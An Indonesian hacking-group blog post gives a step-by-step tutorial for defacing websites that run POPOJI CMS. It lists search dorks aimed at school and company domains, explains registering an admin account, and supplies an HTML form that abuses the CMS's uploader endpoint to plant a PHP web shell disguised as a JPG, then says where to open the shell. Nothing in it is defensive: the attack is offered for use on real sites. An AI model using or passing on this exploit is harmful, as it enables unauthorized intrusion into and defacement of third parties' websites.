Jumat, 05 Agustus 2016

Cara Deface CMS POPOJI

Oke Karna popoji lagi bomming :v saya mau buat tutor deface CMS Popoji
Udh langsung no bnyk kecot :v
DORK
inurl:"/detailpost site:sch.id"
Inurl:/detailpost site:.co.id
Powered by Popoji
© popojicms
kreasi kan sendiri njeng :v

Next
Stepp 1

buka site/po-admin lalu klik create aaccount di bawah

 

Stepp 2

isi form data diri anda :'v
Stepp 3 kalo seperti ini sukses lanjut
stepp 4 buka email kalian verif akun
Stepp 4 login akun di site/po-admin kalo sukses kaya d ss eyak

Stepp 5
exploit kan ini po-admin/js/plugins/uploader/upload.php
kalo seperti d ss lanjut
CSRF CODE
 <form method="post" action="target.wew/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

 stepp 6 next  buka csrf upload shell kalian dalam bentuk jpg ingat JPG bukan PHP
Akses Shell site/po-content/po-upload



Salam 
N00bz Security Squad
PhantomGhost

Share this

0 Comment to "Cara Deface CMS POPOJI"

Posting Komentar